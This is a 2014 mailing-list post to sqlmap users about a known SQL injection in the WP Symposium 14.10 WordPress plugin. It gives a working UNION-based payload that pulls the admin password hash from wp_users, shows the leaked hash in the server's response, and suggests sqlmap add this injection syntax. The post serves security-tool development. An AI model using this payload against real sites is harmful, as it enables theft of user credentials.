[sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
From: Brandon P. <bpe...@gm...> - 2014-12-15 16:49:59
Hello!

Playing around with the following vulnerability: http://www.exploit-db.com/exploits/35505/

Using a payload such as

'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'

does result in a response from the server with the hash of the first user:

1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]

However, sqlmap only finds a time based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC.

It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).

Just a thought!

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website